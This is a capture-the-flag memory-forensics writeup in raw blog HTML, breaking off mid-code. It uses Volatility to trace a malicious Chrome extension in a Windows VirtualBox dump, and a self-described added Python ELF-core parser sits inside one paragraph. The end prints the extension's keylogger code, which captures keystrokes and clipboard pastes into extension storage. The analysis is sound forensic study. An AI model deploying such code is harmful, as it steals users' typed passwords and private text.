/>\n        </picture>\n  </a>\n    </span></p>\n<p>The memory dump provided as the challenge file was an ELF-format file.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">readelf -a ELF memdump.elf</code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 802px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n 
   href=\"/static/62effab36915add533b8a20367f862c7/5a6dd/image-20250323103108160.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 102.91666666666669%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/62effab36915add533b8a20367f862c7/8ac56/image-20250323103108160.webp 240w,\n/static/62effab36915add533b8a20367f862c7/d3be9/image-20250323103108160.webp 480w,\n/static/62effab36915add533b8a20367f862c7/85811/image-20250323103108160.webp 802w\"\n              sizes=\"(max-width: 802px) 100vw, 802px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/62effab36915add533b8a20367f862c7/8ff5a/image-20250323103108160.png 240w,\n/static/62effab36915add533b8a20367f862c7/e85cb/image-20250323103108160.png 480w,\n/static/62effab36915add533b8a20367f862c7/5a6dd/image-20250323103108160.png 802w\"\n            sizes=\"(max-width: 802px) 100vw, 802px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/62effab36915add533b8a20367f862c7/5a6dd/image-20250323103108160.png\"\n            alt=\"image-20250323103108160\"\n            title=\"image-20250323103108160\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Because of that, I initially mistook it for a Linux memory dump. 
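The container format is the first thing to settle before choosing a profile, and the ELF wrapper alone does not say which OS is inside it. The following Python script is an added example, not part of the original writeup: it parses the ELF64 header, walks the program headers, and reads the PT_NOTE segment, classifying the image by its note names (VBCORE/VBCPU for a VirtualBox core dump, VMCOREINFO for a Linux kdump-style image) and flattening the PT_LOAD segments into a raw physical-memory image for tools that do not understand the container. The sample core it parses is constructed inline with invented contents; the challenge file memdump.elf is not included, and the build_sample_core helper exists only to make the example self-contained.

```python
import struct

# ELF spec constants plus the VirtualBox note types from VBox/dbgfcorefmt.h
ELF_MAGIC = bytes.fromhex('7f454c46')   # 0x7f 'E' 'L' 'F'
ET_CORE = 4
PT_LOAD = 1
PT_NOTE = 4
EHDR_FMT = '<16sHHIQQQIHHHHHH'           # little-endian ELF64 header, 64 bytes
PHDR_FMT = '<IIQQQQQQ'                   # ELF64 program header, 56 bytes
NT_VBOXCORE = 0xb00                      # note type of the VBCORE note
NT_VBOXCPU = 0xb01                       # note type of the per-CPU VBCPU notes


def align4(n):
    return (n + 3) & ~3


def parse_notes(seg):
    '''Return [(name, type, desc)] for every note record in a PT_NOTE segment.'''
    notes, off = [], 0
    while off + 12 <= len(seg):
        namesz, descsz, ntype = struct.unpack_from('<III', seg, off)
        off += 12
        name = seg[off:off + namesz].split(bytes(1))[0].decode('ascii', 'replace')
        off += align4(namesz)                # name and desc are both 4-byte padded
        desc = seg[off:off + descsz]
        off += align4(descsz)
        notes.append((name, ntype, desc))
    return notes


def inspect_core(data):
    '''Classify an ELF memory image by the notes its producer left in it.'''
    if data[:4] != ELF_MAGIC or data[4] != 2:          # EI_CLASS 2 = 64-bit
        raise ValueError('not an ELF64 file')
    (_, e_type, e_machine, _, _, e_phoff, _, _, _, e_phentsize, e_phnum,
     _, _, _) = struct.unpack_from(EHDR_FMT, data, 0)
    if e_type != ET_CORE:
        raise ValueError('not an ET_CORE image')
    notes, loads = [], []
    for i in range(e_phnum):
        p_type, _, p_offset, _, p_paddr, p_filesz, p_memsz, _ = struct.unpack_from(
            PHDR_FMT, data, e_phoff + i * e_phentsize)
        if p_type == PT_NOTE:
            notes.extend(parse_notes(data[p_offset:p_offset + p_filesz]))
        elif p_type == PT_LOAD:               # guest physical memory ranges
            loads.append((p_paddr, p_offset, p_filesz, p_memsz))
    names = {n for n, _, _ in notes}
    if 'VBCORE' in names or any(t == NT_VBOXCORE for _, t, _ in notes):
        producer = 'virtualbox'               # hypervisor dump: guest OS still unknown
    elif 'VMCOREINFO' in names:
        producer = 'linux-kdump'
    else:
        producer = 'unknown'
    return {'producer': producer, 'machine': e_machine,
            'notes': [(n, t) for n, t, _ in notes], 'loads': loads}


def to_raw(data, info):
    '''Lay every PT_LOAD segment out at its physical address to get a raw image.'''
    size = max(paddr + memsz for paddr, _, _, memsz in info['loads'])
    raw = bytearray(size)                     # unbacked ranges stay zero-filled
    for paddr, off, filesz, _ in info['loads']:
        raw[paddr:paddr + filesz] = data[off:off + filesz]
    return bytes(raw)


def build_sample_core(notes_spec):
    '''Constructed sample (not a real dump): ELF64 core with the given notes and one 4 KiB PT_LOAD.'''
    def note(name, ntype, desc):
        nb = name.encode() + bytes(1)
        return (struct.pack('<III', len(nb), len(desc), ntype)
                + nb.ljust(align4(len(nb)), bytes(1))
                + desc.ljust(align4(len(desc)), bytes(1)))
    notes = b''.join(note(n, t, d) for n, t, d in notes_spec)
    mem = b'GUEST-PHYS-PAGE'.ljust(4096, b'.')        # fake guest page at paddr 0x1000
    note_off, load_off = 64 + 2 * 56, 4096
    e_ident = ELF_MAGIC + bytes([2, 1, 1]) + bytes(9)   # ELFCLASS64, little-endian, v1
    ehdr = struct.pack(EHDR_FMT, e_ident, ET_CORE, 62, 1, 0, 64, 0, 0, 64, 56, 2, 0, 0, 0)
    ph_note = struct.pack(PHDR_FMT, PT_NOTE, 0, note_off, 0, 0, len(notes), len(notes), 0)
    ph_load = struct.pack(PHDR_FMT, PT_LOAD, 4, load_off, 0, 0x1000, len(mem), len(mem), 0x1000)
    body = ehdr + ph_note + ph_load + notes
    return body + bytes(load_off - len(body)) + mem


if __name__ == '__main__':
    sample = build_sample_core([('VBCORE', NT_VBOXCORE, bytes(16)), ('VBCPU', NT_VBOXCPU, bytes(32))])
    info = inspect_core(sample)
    print(info['producer'], info['notes'], info['loads'])
    print(len(to_raw(sample, info)), 'bytes of raw physical memory')
```

Pointing inspect_core at a real dump (open the file in binary mode and pass the bytes) reports the producer from the notes alone; the guest operating system is not recorded in the container, only in the memory it carries, which is why a hypervisor core dump of a Windows VM looks like a Linux artifact from the outside and still needs a framework such as Volatility to identify the OS from the memory contents.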
However, when I tried analyzing it with Vol2, I realized it was actually a dump of the <code class=\"language-text\">VirtualBoxCoreDumpElf64</code> type, and that the environment where the dump had been captured was in fact Windows.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/d1c21e6bf01495d792e5f3b8c5038060/0d6fe/image-20250323130932499.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 15%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAmUlEQVQI1zWOSQqAMAxF3TpUcCFi7SBOSLVFKl31/uf6koCL8Mhv8prCOYfzPEF83xfee1zXhX3fmZSv64p5nmGtxTRNkFJiHEfOh2HgnnIhBAp6aNuWh0lMFWOEMYaFOWeklPA8D+c/Qwg4joOFtE8yYlGWJeq6RtM0qKoKXdfx8LIs2LYN932znEopBa01f/5fSwf97PseH5pKUnjfXKFCAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/d1c21e6bf01495d792e5f3b8c5038060/8ac56/image-20250323130932499.webp 240w,\n/static/d1c21e6bf01495d792e5f3b8c5038060/d3be9/image-20250323130932499.webp 480w,\n/static/d1c21e6bf01495d792e5f3b8c5038060/e46b2/image-20250323130932499.webp 960w,\n/static/d1c21e6bf01495d792e5f3b8c5038060/177a2/image-20250323130932499.webp 1115w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/d1c21e6bf01495d792e5f3b8c5038060/8ff5a/image-20250323130932499.png 240w,\n/static/d1c21e6bf01495d792e5f3b8c5038060/e85cb/image-20250323130932499.png 480w,\n/static/d1c21e6bf01495d792e5f3b8c5038060/d9199/image-20250323130932499.png 
960w,\n/static/d1c21e6bf01495d792e5f3b8c5038060/0d6fe/image-20250323130932499.png 1115w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/d1c21e6bf01495d792e5f3b8c5038060/d9199/image-20250323130932499.png\"\n            alt=\"image-20250323130932499\"\n            title=\"image-20250323130932499\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Volatility can analyze <code class=\"language-text\">VirtualBoxCoreDumpElf64</code> dumps directly.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">vol -f memdump.elf windows.info</code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/ad315f8cf955ab1c47d2fd4fb9f0f058/f705a/image-20250323131514303.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 35%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAAAt0lEQVQoz6WP2Q6CMBREC0JZDUuBVkFQWYSo//95Iy0E9BF8mEzae3NmLqmHEvktxaUsELMYURSBJWz0ELqugxCyTUIIMJYokH/0YVnWLApKKUzT/BWdXM5t21a70uWfYRxA2q7B6SwQBAGyLIXnexOImsuyfK9Bq+RskrWEk9f7ibIazy5y1M0dmqZtP/NbEljNQNnQcabU3cB+6NG0Dbjg4Jyr6n817B4dVMtrpaBhGMJ13d3gD/kmmJcfHHKXAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              
srcset=\"/static/ad315f8cf955ab1c47d2fd4fb9f0f058/8ac56/image-20250323131514303.webp 240w,\n/static/ad315f8cf955ab1c47d2fd4fb9f0f058/d3be9/image-20250323131514303.webp 480w,\n/static/ad315f8cf955ab1c47d2fd4fb9f0f058/e46b2/image-20250323131514303.webp 960w,\n/static/ad315f8cf955ab1c47d2fd4fb9f0f058/f992d/image-20250323131514303.webp 1440w,\n/static/ad315f8cf955ab1c47d2fd4fb9f0f058/e8e93/image-20250323131514303.webp 1493w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/ad315f8cf955ab1c47d2fd4fb9f0f058/8ff5a/image-20250323131514303.png 240w,\n/static/ad315f8cf955ab1c47d2fd4fb9f0f058/e85cb/image-20250323131514303.png 480w,\n/static/ad315f8cf955ab1c47d2fd4fb9f0f058/d9199/image-20250323131514303.png 960w,\n/static/ad315f8cf955ab1c47d2fd4fb9f0f058/07a9c/image-20250323131514303.png 1440w,\n/static/ad315f8cf955ab1c47d2fd4fb9f0f058/f705a/image-20250323131514303.png 1493w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/ad315f8cf955ab1c47d2fd4fb9f0f058/d9199/image-20250323131514303.png\"\n            alt=\"image-20250323131514303\"\n            title=\"image-20250323131514303\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>So first, I identified Chrome’s PID, which is the first Flag, with the following command.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">vol -f memdump.elf windows.cmdline.CmdLine</code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    
class=\"gatsby-resp-image-link\"\n    href=\"/static/9ed285191880256fc8dbe498941741d0/bf6f8/image-20250323132256390.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 11.666666666666666%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAeElEQVQI1yWL3QqCQBQGfZjQXdP1/Hg280qIIILo/Z9mWuli+BiGr0vXzPs+s8tEzCOfSLzWzDd6dp1QX3F3wo2tBrdorsrmQnXFWjuJCGqtdMOYOSyxzhnJiYf0HMvAUy5EGSmiqP5xa2cz1BRRwRoqC0spbU9XfvbuP08KV9S1AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/9ed285191880256fc8dbe498941741d0/8ac56/image-20250323132256390.webp 240w,\n/static/9ed285191880256fc8dbe498941741d0/d3be9/image-20250323132256390.webp 480w,\n/static/9ed285191880256fc8dbe498941741d0/e46b2/image-20250323132256390.webp 960w,\n/static/9ed285191880256fc8dbe498941741d0/f992d/image-20250323132256390.webp 1440w,\n/static/9ed285191880256fc8dbe498941741d0/882b9/image-20250323132256390.webp 1920w,\n/static/9ed285191880256fc8dbe498941741d0/2b8a8/image-20250323132256390.webp 2047w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/9ed285191880256fc8dbe498941741d0/8ff5a/image-20250323132256390.png 240w,\n/static/9ed285191880256fc8dbe498941741d0/e85cb/image-20250323132256390.png 480w,\n/static/9ed285191880256fc8dbe498941741d0/d9199/image-20250323132256390.png 960w,\n/static/9ed285191880256fc8dbe498941741d0/07a9c/image-20250323132256390.png 1440w,\n/static/9ed285191880256fc8dbe498941741d0/29114/image-20250323132256390.png 1920w,\n/static/9ed285191880256fc8dbe498941741d0/bf6f8/image-20250323132256390.png 2047w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            
type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/9ed285191880256fc8dbe498941741d0/d9199/image-20250323132256390.png\"\n            alt=\"image-20250323132256390\"\n            title=\"image-20250323132256390\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># 1. What is the PID of the Original (First) Google Chrome process:</span>\n<span class=\"token number\">4080</span>\tchrome.exe\t<span class=\"token string\">\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"</span></code></pre></div>\n<p>Incidentally, when I tried to analyze this dump using the latest version of Volatility 3, it failed with an <code class=\"language-text\">_MM_SESSION_SPACE</code> error. That issue had already been fixed in the following PR, so reinstalling from the latest branch resolved it.</p>\n<p>Reference: <a href=\"https://github.com/volatilityfoundation/volatility3/pull/1399\">Windows: Handle missing _MM_SESSION_SPACE by dgmcdona · Pull Request #1399 · volatilityfoundation/volatility3 · GitHub</a></p>\n<p>The next Flag can be obtained simply by using <code class=\"language-text\">strings</code> or by running the <code class=\"language-text\">vol -f memdump.elf windows.filescan</code> command.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># 2. 
What is the only Folder on the Desktop</span>\nmalext</code></pre></div>\n<p>Next, searching the results of <code class=\"language-text\">vol -f memdump.elf windows.filescan</code> for extension-related entries lets you extract several extension IDs, and one of them turns out to be the Flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># 3. What is the Extension's ID (ex: hlkenndednhfkekhgcdicdfddnkalmdm)</span>\nnnjofihdjilebhiiemfmdlpbdkbjcpae</code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/8d2be198658c8ec44ebb02b3be12e428/6edca/image-20250327220238511.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 6.25%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAYAAADeko4lAAAACXBIWXMAAAsTAAALEwEAmpwYAAAARklEQVQI1x2LMQ6AMAwDWaqMdCCMpXGS8v8XmpThZJ8sH4ZJwLje5O4e+N0KuHFWDr0YrRHPqN0ZGcxif3IF9Vb2flJE+AFB3hsD7LvJxQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/8d2be198658c8ec44ebb02b3be12e428/8ac56/image-20250327220238511.webp 240w,\n/static/8d2be198658c8ec44ebb02b3be12e428/d3be9/image-20250327220238511.webp 480w,\n/static/8d2be198658c8ec44ebb02b3be12e428/e46b2/image-20250327220238511.webp 960w,\n/static/8d2be198658c8ec44ebb02b3be12e428/2d20a/image-20250327220238511.webp 1351w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            
srcset=\"/static/8d2be198658c8ec44ebb02b3be12e428/8ff5a/image-20250327220238511.png 240w,\n/static/8d2be198658c8ec44ebb02b3be12e428/e85cb/image-20250327220238511.png 480w,\n/static/8d2be198658c8ec44ebb02b3be12e428/d9199/image-20250327220238511.png 960w,\n/static/8d2be198658c8ec44ebb02b3be12e428/6edca/image-20250327220238511.png 1351w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/8d2be198658c8ec44ebb02b3be12e428/d9199/image-20250327220238511.png\"\n            alt=\"image-20250327220238511\"\n            title=\"image-20250327220238511\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>From reading other writeups, it seems that because this extension was not downloaded from the store, it does not exist in the normal <code class=\"language-text\">User Data/Default/Extensions</code> folder and is instead placed under the local storage path <code class=\"language-text\">User Data\\Default\\Local Extension Settings</code>.</p>\n<p>As confirmed in the previous Flag, the suspicious extension’s code appeared to be placed in <code class=\"language-text\">malext</code> on the Desktop.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 925px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/10049c663c10aedbe034b46d6712e5e8/2a50c/image-20250327221536229.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 12.916666666666664%; position: relative; bottom: 0; left: 0; background-image: 
url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAo0lEQVQI122OzQ6CMACDIcYbCYIMFeVnA+Y2QMTw/q/2OT2QmHho2ku/NugfVyqb0ThB1RWUUqPvXkajzidMLlBKYqzBDZZjdiQIAsIw/PEtr+vKrShRssU5izE90zQwLjNLcWHa7bAe9hmpm5ooijbAXy2vJ42skarxL+7f4jg6hnli9kC339O2isGPaN3T646yKknTlNy/T9IE4T0+xAiR8QaPoU2Pf0TJxAAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/10049c663c10aedbe034b46d6712e5e8/8ac56/image-20250327221536229.webp 240w,\n/static/10049c663c10aedbe034b46d6712e5e8/d3be9/image-20250327221536229.webp 480w,\n/static/10049c663c10aedbe034b46d6712e5e8/31b98/image-20250327221536229.webp 925w\"\n              sizes=\"(max-width: 925px) 100vw, 925px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/10049c663c10aedbe034b46d6712e5e8/8ff5a/image-20250327221536229.png 240w,\n/static/10049c663c10aedbe034b46d6712e5e8/e85cb/image-20250327221536229.png 480w,\n/static/10049c663c10aedbe034b46d6712e5e8/2a50c/image-20250327221536229.png 925w\"\n            sizes=\"(max-width: 925px) 100vw, 925px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/10049c663c10aedbe034b46d6712e5e8/2a50c/image-20250327221536229.png\"\n            alt=\"image-20250327221536229\"\n            title=\"image-20250327221536229\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>So I extracted the extension code with the following commands.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">vol -o /tmp -f memdump.elf windows.dumpfiles.DumpFiles --virtaddr 0xa708c8d9ec30\nvol -o /tmp -f memdump.elf windows.dumpfiles.DumpFiles --virtaddr 
0xa708c8da1e30</code></pre></div>\n<p>Reading this code shows that the logs were probably stored in <code class=\"language-text\">chrome.storage.local</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"javascript\"><pre class=\"language-javascript\"><code class=\"language-javascript\"><span class=\"token keyword\">var</span> conn <span class=\"token operator\">=</span> chrome<span class=\"token punctuation\">.</span>runtime<span class=\"token punctuation\">.</span><span class=\"token function\">connect</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">{</span> <span class=\"token literal-property property\">name</span><span class=\"token operator\">:</span> <span class=\"token string\">\"conn\"</span> <span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\nchrome<span class=\"token punctuation\">.</span>runtime<span class=\"token punctuation\">.</span><span class=\"token function\">sendMessage</span><span class=\"token punctuation\">(</span><span class=\"token string\">'update'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n<span class=\"token punctuation\">(</span><span class=\"token keyword\">async</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">const</span> response <span class=\"token operator\">=</span> <span class=\"token keyword\">await</span> chrome<span class=\"token punctuation\">.</span>runtime<span class=\"token punctuation\">.</span><span class=\"token function\">sendMessage</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">{</span> <span class=\"token literal-property property\">check</span><span class=\"token operator\">:</span> <span class=\"token string\">\"replace_html\"</span> <span 
class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    console<span class=\"token punctuation\">.</span><span class=\"token function\">log</span><span class=\"token punctuation\">(</span>response<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\nchrome<span class=\"token punctuation\">.</span>runtime<span class=\"token punctuation\">.</span><span class=\"token function\">sendMessage</span><span class=\"token punctuation\">(</span><span class=\"token string\">'replace_html'</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">(</span><span class=\"token parameter\">response</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    conn<span class=\"token punctuation\">.</span><span class=\"token function\">postMessage</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">{</span> <span class=\"token string-property property\">\"type\"</span><span class=\"token operator\">:</span> <span class=\"token string\">\"check\"</span><span class=\"token punctuation\">,</span> <span class=\"token string-property property\">\"data\"</span><span class=\"token operator\">:</span> <span class=\"token string\">\"replace_html\"</span> <span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\ndocument<span class=\"token punctuation\">.</span><span class=\"token function\">addEventListener</span><span class=\"token punctuation\">(</span><span class=\"token 
string\">\"keydown\"</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">(</span><span class=\"token parameter\">event</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">const</span> key <span class=\"token operator\">=</span> event<span class=\"token punctuation\">.</span>key<span class=\"token punctuation\">;</span>\n    conn<span class=\"token punctuation\">.</span><span class=\"token function\">postMessage</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">{</span> <span class=\"token string-property property\">\"type\"</span><span class=\"token operator\">:</span> <span class=\"token string\">\"key\"</span><span class=\"token punctuation\">,</span> <span class=\"token string-property property\">\"data\"</span><span class=\"token operator\">:</span> key <span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">return</span> <span class=\"token boolean\">true</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n\ndocument<span class=\"token punctuation\">.</span><span class=\"token function\">addEventListener</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"paste\"</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">(</span><span class=\"token parameter\">event</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">let</span> paste <span class=\"token operator\">=</span> event<span class=\"token punctuation\">.</span>clipboardData<span class=\"token punctuation\">.</span><span 
class=\"token function\">getData</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"text/plain\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    conn<span class=\"token punctuation\">.</span><span class=\"token function\">postMessage</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">{</span> <span class=\"token string-property property\">\"type\"</span><span class=\"token operator\">:</span> <span class=\"token string\">\"paste\"</span><span class=\"token punctuation\">,</span> <span class=\"token string-property property\">\"data\"</span><span class=\"token operator\">:</span> paste <span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">return</span> <span class=\"token boolean\">true</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n\n<span class=\"token keyword\">function</span> <span class=\"token function\">addLog</span><span class=\"token punctuation\">(</span><span class=\"token parameter\">s</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    \n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>s<span class=\"token punctuation\">.</span>length <span class=\"token operator\">!=</span> <span class=\"token number\">1</span> <span class=\"token operator\">&amp;&amp;</span> s <span class=\"token operator\">!==</span> <span class=\"token string\">\"Enter\"</span> <span class=\"token operator\">&amp;&amp;</span> <span class=\"token operator\">!</span>s<span class=\"token punctuation\">.</span><span class=\"token function\">startsWith</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"PASTE\"</span><span class=\"token 
punctuation\">)</span><span class=\"token punctuation\">)</span>  <span class=\"token punctuation\">{</span>\n        s <span class=\"token operator\">=</span> <span class=\"token template-string\"><span class=\"token template-punctuation string\">`</span><span class=\"token string\">|</span><span class=\"token interpolation\"><span class=\"token interpolation-punctuation punctuation\">${</span>s<span class=\"token interpolation-punctuation punctuation\">}</span></span><span class=\"token string\">|</span><span class=\"token template-punctuation string\">`</span></span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span> <span class=\"token keyword\">else</span> <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>s <span class=\"token operator\">===</span> <span class=\"token string\">\"Enter\"</span> <span class=\"token operator\">||</span> s<span class=\"token punctuation\">.</span><span class=\"token function\">startsWith</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"PASTE\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        s <span class=\"token operator\">=</span> s <span class=\"token operator\">+</span> <span class=\"token string\">\"\\r\\n\"</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n\n    chrome<span class=\"token punctuation\">.</span>storage<span class=\"token punctuation\">.</span>local<span class=\"token punctuation\">.</span><span class=\"token function\">get</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"log\"</span><span class=\"token punctuation\">]</span><span 